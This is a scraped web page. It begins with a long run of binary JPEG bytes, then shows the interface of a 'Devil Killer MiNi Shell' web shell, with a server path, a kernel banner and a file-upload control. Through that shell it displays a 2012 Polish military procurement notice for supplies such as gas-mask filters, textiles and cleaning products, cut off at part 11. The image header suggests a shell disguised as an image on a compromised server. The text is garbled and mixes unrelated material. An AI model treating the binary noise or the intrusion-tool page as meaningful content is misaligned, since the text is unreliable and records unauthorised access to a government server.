JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120511/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120511/151184-N-2012.html

<p class="kh_header"><b>Warszawa: DOSTAWA ŚRODKÓW CZYSTOŚCI, WYPOSAŻENIA DOMOWEGO, ODZIEŻY BRANŻOWEJ, WYROBÓW WŁÓKIENNICZYCH, MEBLARSKICH, ARTYKUŁÓW BIUROWYCH, MASEK PRZECIWGAZOWYCH, WORKÓW I FLAG</b><br>
<b>Numer ogłoszenia: 151184 - 2012; data zamieszczenia: 11.05.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Jednostka Wojskowa 4226 , Ul. Marsa 110, 04-470 Warszawa, woj. mazowieckie, tel. 22 6815 030, faks 22 6815 093.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.2rblog.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka Budżetowa - odsektor Rządowy/Jednostka Wojskowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> DOSTAWA ŚRODKÓW CZYSTOŚCI, WYPOSAŻENIA DOMOWEGO, ODZIEŻY BRANŻOWEJ, WYROBÓW WŁÓKIENNICZYCH, MEBLARSKICH, ARTYKUŁÓW BIUROWYCH, MASEK PRZECIWGAZOWYCH, WORKÓW I FLAG.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa środków czystości, wyposażenia domowego, odzieży branżowej, wyrobów włókienniczych, meblarskich, artykułów biurowych, masek przeciwgazowych, worków i flag  z podziałem na 29 zadań w ilościach określonych w załączniku nr 1 do SIWZ, zrealizowana w terminie do 30 dni od daty zawarcia umowy.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 18.10.00.00-0, 18.90.00.00-8, 30.10.00.00-0, 33.70.00.00-7, 35.80.00.00-2, 39.20.00.00-4, 39.50.00.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 29.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 30.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga zabezpieczenia oferty wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie wymagań, których spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny. Do potwierdzenia oświadczeniem w załączniku nr 3 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna spełnienie tego warunku, jeżeli Wykonawca w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał, a w przypadku świadczeń okresowych lub ciągłych również wykonuje, minimum 1 (jedną) dostawę, odpowiadającą swoim rodzajem dostawie  stanowiącej przedmiot zamówienia z podaniem wartości, przedmiotu, dat wykonania i odbiorców, oraz załączy dokumenty potwierdzające, że te dostawy zostały wykonane lub są wykonywane należycie. Wartość każdej (pojedynczej) dostawy winna być nie mniejsza niż:
na zadanie 1 -    200,00 zł;
na zadanie 2 - 3 100,00 zł;
na zadanie 3 -    370,00 zł;
na zadanie 4 -    110,00 zł;
na zadanie 5 -    370,00 zł;
na zadanie 6 -    505,00 zł;
na zadanie 7 -  1 100,00 zł;
na zadanie 8 -    160,00 zł;
na zadanie 9 -      70,00 zł;
na zadanie 10 -    50,00 zł;
na zadanie 11 -  250,00 zł;
na zadanie 12 -  830,00 zł;
na zadanie 13 -  300,00 zł;
na zadanie 14 -  600,00 zł;
na zadanie 15 -  370,00 zł;
na zadanie 16 -  180,00 zł;
na zadanie 17 -  680,00 zł;
na zadanie 18 -    50,00 zł;
na zadanie 19 -    25,00 zł;
na zadanie 20 -    60,00 zł;
na zadanie 21 -   740,00 zł;					
na zadanie 22 -  730,00 zł;
na zadanie 23 -  670,00 zł;
na zadanie 24 -  230,00 zł;
na zadanie 25 -   770,00 zł;
na zadanie 26 -   880,00 zł;
na zadanie 27 -  740,00 zł;
na zadanie 28 -  900,00 zł;
na zadanie 29 -  880,00 zł;

UWAGA
       Jeżeli Wykonawca składa ofertę na kilka części (zadań) jednocześnie, a na potwierdzenie spełnienia warunku posiada jedną dostawę (oraz np. referencje), wartość tej dostawy /usługi winna być nie mniejsza niż łączna wartość części (zadań) na które składana jest oferta. 
      W przypadku świadczeń okresowych lub ciągłych, wartość wykonanej dostawy musi odpowiadać co najmniej kwocie zadania, na które Wykonawca składa ofertę.
      Za dostawy tego samego rodzaju zamawiający uzna dostawy przedmiotów 
o przeznaczeniu i funkcji tożsamej z przedmiotem zamówienia.
      W przypadku wartości dostaw wyrażonej w innej walucie, Zamawiający, w celu oceny spełnienia ww. warunku, dokona przeliczenia tych wartości wg. kursu z dnia zawarcia umowy na podstawie Tabeli kursów średnich NBP publikowanych na stronie internetowej:
 http://www.nbp.pl/home.aspx?c=/ascx/archa.ascx
Do potwierdzenia oświadczeniem w  załączniku nr 4 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że warunek został spełniony, jeżeli    Wykonawca posiada środki finansowe lub zdolność kredytową w wysokości nie mniejszej niż łącznie 15 920,00 PLN, w tym:
na zadanie 1 -    200,00 zł;
na zadanie 2 - 3 100,00 zł;
na zadanie 3 -    370,00 zł;
na zadanie 4 -    110,00 zł;
na zadanie 5 -    370,00 zł;
na zadanie 6 -    505,00 zł;
na zadanie 7 -  1 100,00 zł;
na zadanie 8 -    160,00 zł;
na zadanie 9 -      70,00 zł;
na zadanie 10 -    50,00 zł;
na zadanie 11 -  250,00 zł;
na zadanie 12 -  830,00 zł;
na zadanie 13 -  300,00 zł;
na zadanie 14 -  600,00 zł;
na zadanie 15 -  370,00 zł;
na zadanie 16 -  180,00 zł;
na zadanie 17 -  680,00 zł;
na zadanie 18 -    50,00 zł;
na zadanie 19 -    25,00 zł;
na zadanie 20 -    60,00 zł;
na zadanie 21 -   740,00 zł;
na zadanie 22 -  730,00 zł;
na zadanie 23 -  670,00 zł;
na zadanie 24 -  230,00 zł;
na zadanie 25 -   770,00 zł;
na zadanie 26 -   880,00 zł;
na zadanie 27 -  740,00 zł;
na zadanie 28 -  900,00 zł;
na zadanie 29 -  880,00 zł;
    UWAGA
      Jeżeli Wykonawca składa ofertę na kilka części (zadań) jednocześnie, na potwierdzenie spełnienia niniejszego warunku, winien wykazać wartość posiadanych środków finansowych lub zdolności kredytowej w wysokości nie mniejszej niż łączna wartość części (zadań) na które składana jest oferta. 
Do potwierdzenia oświadczeniem w  załączniku nr 4 do SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Oświadczenia szczegółowe o: 
 - należytym wykonaniu minimum jednej dostawy, odpowiadającej swoim rodzajem i wartością (wskazaną przez Zamawiającego w Rozdziale V pkt. 1.2 SIWZ) dostawom stanowiącym przedmiot zamówienia;
- posiadaniu środków finansowych lub zdolności kredytowej w wysokości nie mniejszej niż wskazanej przez Zamawiającego w Rozdziale V pkt. 1.3 SIWZ.
      Z wykorzystaniem wzoru  -  załącznik nr 4 do SIWZ.
2.Pełnomocnictwo do podpisania oferty i załączników o ile prawo do reprezentowania Wykonawcy nie wynika z innych dokumentów złożonych wraz z ofertą. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, do oferty należy dołączyć pełnomocnictwo podpisane przez uprawnionych przedstawicieli pozostałych Wykonawców, upoważniające jednego z Wykonawców do reprezentowania pozostałych.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Na podstawie art. 144 ustawy Pzp, w przypadkach niezależnych od Zamawiającego, zastrzega się dokonanie zmian treści umowy  w zakresie:
1.	terminu realizacji umowy;
2.	zmiany miejsca świadczenia;
Wszelkie zmiany dotyczące treści umowy dokonywane będą w formie pisemnej (aneksu do umowy).</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.2rblog.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Siedziba Zamawiającego, ul. Marsa 110, 00-470 Warszawa, budynek nr 2 pokój nr 5.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.05.2012 godzina 08:30, miejsce: Siedziba Zamawiającego, ul. Marsa 110, 00-470 Warszawa, Kancelaria Ogólna - budynek nr 3, pokój nr 8.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dostawa: obrusów..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa obrusów - 8 szt.
Obrus:
-  plamoodporny,
-  poliester 100 %,
- wymiary 150 x 150 cm,
- kolor: ecru - 2 szt.
      biały - 4 szt.
      beżowy - 2 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.51.31.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostawa tkaniny brezentowej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa tkaniny brezentowej w ilości 100 mb;
Cechy tkaniny brezentowej podano w załączniku nr 1 do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.52.21.10-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Dostawa masek lakierniczych z wymiennymi wkładami.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa masek lakierniczych z wymiennymi wkładami w ilości 4 szt.
Maska lakiernicza z wymiennymi wkładami:
- część twarzowa: maska lub półmaska z regulacją na paskach;
- pochłaniacze 2 szt.;
- filtry 2 szt.;
- filtry zapasowe nie mniej niż 10 szt.;
Maska ma chronić układ oddechowy przed oparami, dymami i gazami oraz innymi czynnikami występującymi podczas lakierowania, laminowania lub grawerowania laserowego.
- waga max. 0,5 kg..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 18.14.30.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Dostawa zszywek tapicerskich.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa zszywek tapicerskich w ilości 50 opakowań, w tym:
25 opakowań - o wysokości 8 mm;
25 opakowań - o wysokości 10 mm;
Zszywki przeznaczone są do łączenia za pomocą zszywaczy
r  ręcznych i elektrycznych, hartowane o wymiarach:
   - szerokość zszywki 11,3 mm
   - grubość drutu: 0,7mm 
   - ilość w opakowaniu 1000 szt.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.71.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Dostawa serwetek papierowych i mydła w płynie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa serwetek papierowych i mydła, w ilościach:
1. serwetki kolorowe - 100 opakowań;
Serwetki papierowe wymiary: szerokość 33 cm, długość 33 cm, trzywarstwowe, wybielane bez chloru, do dekoru użyte farby wodorozcięczalne, 20 sztuk w opakowaniu. Dekorowane wzorami kwiatowymi, orientalnymi i tradycyjnymi
2. serwetki białe - 50 opakowań;
Serwetki białe wykonane z białej bibuły, wymiary szerokość 15 cm długość 15 cm, opakowanie jednostkowe zawiera 500 sztuk
3 mydło w płynie - 29l/ 116szt. po 250 ml
Zawiera  kombinację substancji myjących i odżywczych, (na przykład miód i mleko lub oliwki), chroniące skórę przed nadmiernym wysuszeniem. Przeznaczone do codziennego mycia rąk i całego ciała, delikatne środki powierzchniowo czynne, produkt musi posiadać atest PZH, powinien być przebadany dermatologicznie. Opakowanie 250 ml z dozownikiem..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.76.40.00-3, 33.71.19.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Dostawa pochłaniaczy A1 do maski SECURA 2000,   filtrów P1 do pochłaniacza maski SECURA 2000 oraz pierścieni dociskowych do filtra P1 maski SECURA 2000.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa pochłaniaczy A1 do maski SECURA 2000 - 50 szt.;
1. Dostawa filtrów P1 do pochłaniacza maski SECURA 2000 - 200 szt;
Pochłaniacz typ A1 stosowany w przypadku ochrony przed rozpuszczalnikami organicznymi, węglowodorami, alkoholami, aldehydami, kwasami organicznymi, estrami, ketonami, styrenami
2. Dostawa pierścieni dociskowych do filtra P1 maski SECURA 2000 - 10 kpl;
Filtr P1 stosowany w przypadku ochrony przed:
pył granitu, marmuru, piasek, pyły z obróbki żelaza, wypełniacze do gumy, nawozy sztuczne.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 35.81.40.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Dostawa:
prezentera ze wskaźnikiem laserowym oraz 
choinki z tworzywa sztucznego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa:
1. Prezentera ze wskaźnikiem laserowym - 1 szt;
Prezenter ze wskaźnikiem laserowym,
wbudowana pamięć nie mniejsza niż 1 GB umożliwiająca zapisanie i przechowywanie prezentacji,
zasięg minimum 20m,
komunikacja bezprzewodowa 2,4GHz,
cztery intuicyjne w użyciu przyciski,
wyposażony we wskaźnik sygnalizacyjny wymiany baterii,
odbiornik USB chowany w korpus prezentera,
w zestawie dwie baterie AAA.
2. Choinki z tworzywa sztucznego - 5 szt;
gatunek: sosna zielona z folii  PCV o  bardzo głębokiej zielonej barwie, igliwie gęste
wymiary:  250cm-5 sztuk.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.29.30.00-2, 39.29.89.10-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Dostawa gąbek do mycia naczyń.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa gąbek do mycia naczyń w ilości 130 opakowań;
Gąbka do mycia naczyń o wymiarach 7 x10 cm, jedna strona przeznaczona do szorowania, opakowanie zawiera 5 gąbek.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.22.43.20-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Dostawa pędzli płaskich ogólnego stosowania.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa pędzli w ilościach:
Pędzel angielski płaski ogólnego stosowania - 36 mm - 30 szt;
Pędzel angielski płaski ogólnego stosowania - 63mm - 30 szt;
Cechy pędzli podano w opisie przedmiotu zamówienia - załącznik nr 1 do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.22.42.10-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Dostawa noży do tapet.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa noży do tapet w ilości 10 szt;
Charakterystyka przedmiotu: 
    - nóż z łamanym ostrzem;  
    - szerokość ostrza: 18 mm; 
    - grubość ostrza: 0,50 mm 
    - metalowa prowadnica 
    - antypoślizgowy korpus 
    - łamacz zużytego ostrza 
- automatyczna blokada ostrza
  Zastosowanie: 
     - szeroki zakres prac warsztatowych, budowlanych oraz domowych.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.24.11.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Dostawa nożyków do tapet.</p>
